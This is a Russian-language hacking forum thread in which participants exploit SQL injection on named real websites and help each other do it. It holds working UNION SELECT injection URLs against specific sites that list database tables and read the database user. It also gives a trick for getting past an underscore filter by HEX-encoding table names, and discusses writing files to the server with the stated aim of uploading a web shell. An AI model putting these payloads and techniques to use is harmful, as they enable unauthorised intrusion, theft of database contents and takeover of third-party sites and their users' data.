Такую же ошибку(почти) могу вызвать в другом скрипте про limit там вот что: t.topic_last_post_id DESC LIMIT -30, 30 Line : 273 File : viewforum.php
Значит инъекция не возможна?Щас толька ссылка была недавно уже нет!Толи автор удалил свой пост толи мне выспаться нужно!Если автор удалил можешь дать почитать?
Уважаемые всеведущие гуру андеграундного мира,позвольте обратиться к вам с простым но ацки актуальным вопросом,что делать,если фильтруется "_" а все таблички с префиксом?)
Боюсь отвечать на Ваш вопрос , во избежании причисления меня к "всеведущим гуру андеграундного мира" По теме: дать ссылку
используй HEX для кодирования имен таблиц. То есть у себя на компе делаешь Code: SELECT HEX('tablename') и результат подставляешь в запрос, не забыв подставить 0x в начало.. Получится чтото вроде 0x35E45F337D
помогите разобраться! вот раскрутил скулу: http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+information_schema.tables/**/ хочу залить shell через форум! http://15rus.ru/forum/ Не могу понять где здесь таблицы форума???
По форуму видно, что это phpbb. Какая версия я хз, с этим форумом мало знаком. Вот 3 таблицы: http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+information_schema.tables+where+table_name+like+0x257068706262257573657273-- какая-то из них нужная. зы: админы того сайта просто ппц - кучу софта понаставили, помойка просто)
MirA Забавно, действительно фильтрация "_" Есть очень большая вероятность того, что user под которым работает база, file_priv=Y http://www.rncb.ru/print_view.php?id=450&fpath=-2+union+select+1,2,3,UNHEX(HEX(user())),5,6,7,8,9,10,11,12,13+from+mysql.user+--+ root@localhost Прочитать файлы мы не сможем, т.к LOAD_FILE, и посмотреть тоже , т.к file_priv, а вот записать ... Тоесть ищем папку на запись, и пробуем PS prescott,wildshaman Зачем вообще это писать?
Скажите что за ошибка 1 - Can't create/write to file '/home/localhost/www/1.txt' (Errcode: 2) з.ы. в гугл не посылать,парсил)
Помогите пожалуйста разобраться, вот нашел иньекцию http://www.rfrap.ru/site/index.php?p=16;' при попытке подобрать количество полей вылезает подозреваю, что это 3 версия мускуля и похоже blind SQL-injection, а так вообще хз, просто я никогда не встречался с этим....